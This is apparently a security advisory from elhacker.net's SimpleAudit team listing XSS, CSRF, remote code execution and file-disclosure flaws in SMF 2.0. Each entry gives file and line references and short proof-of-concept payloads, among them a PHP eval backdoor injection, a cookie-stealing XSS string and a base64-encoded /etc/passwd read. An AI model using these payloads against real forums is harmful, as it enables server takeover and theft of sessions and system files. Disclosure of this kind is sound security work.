XSS

This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net                          
http://labs.elhacker.net/simpleaudit

Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities. 

The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today, on SMF 1.1.11 visit simplemachines.org for details.


You can review the list of the published vulnerabilities in:
http://code.google.com/p/smf2-review/issues/list        


Description: XSS in 'website' field in User Profile
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Profile-Modify.php:802
Vulnerable URL: N/A
PoC: javascript:alert(document.cookie);//http://xx


Description: PHP Remote Code Execution
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/ManageServer.php:1409
Vulnerable URL: Themes/default/languages/index.english.php
PoC: en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //


Description:CSRF theme change
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Load.php#1245
Vulnerable URL: index.php?theme=2
PoC: N/A


Description: Subforum Category Collapse CSRF
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/BoardIndex.php:130
Vulnerable URL: index.php?action=collapse;c=1;sa=collapse
PoC: N/A


Description: CSRF in package server manager
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Packages.php#1189
Vulnerable URL:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
PoC: N/A


Description: XSS in package server manager
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/PackageGet.php#732
Vulnerable URL: index.php?action=packageget
PoC: "Add server" => Name: <h1>XSS</h1>


Description: CSRF package deletion and installed package disclosure
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Packages.php#1189
Vulnerable URL:  
/index.php?action=admin;area=packages;sa=remove;package=.htaccess
PoC: N/A


Description: Attached files configuration CSRF
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/ManageAttachments.php#117
Sources/ManageAttachments.php#162
Vulnerable URL:  
/index.php?action=admin;area=manageattachments;sa=attachments
PoC: POST:
attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150


Description: XSS in "Enable basic HTML in posts"
Discovered by: sirdarckcat@elhacker.net
Vulnerable code: N/A
Vulnerable URL: N/A
PoC: <img src="http:// alt="x http://www.google.com/onerror=alert(1)// x">


Description: Remote File Disclosure logs
Discovered by: sirdarckcat@elhacker.net
Vulnerable code: N/A
Vulnerable URL:  
index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==
PoC: An attacker forcing that page to render as CSS can enable him to read  
it's content.


Description: CSRF in Moderation Preferences
Discovered by: sirdarckcat@elhacker.net
Vulnerable code: N/A
Vulnerable URL: index.php?action=moderate;area=settings
PoC: this is not protected against csrf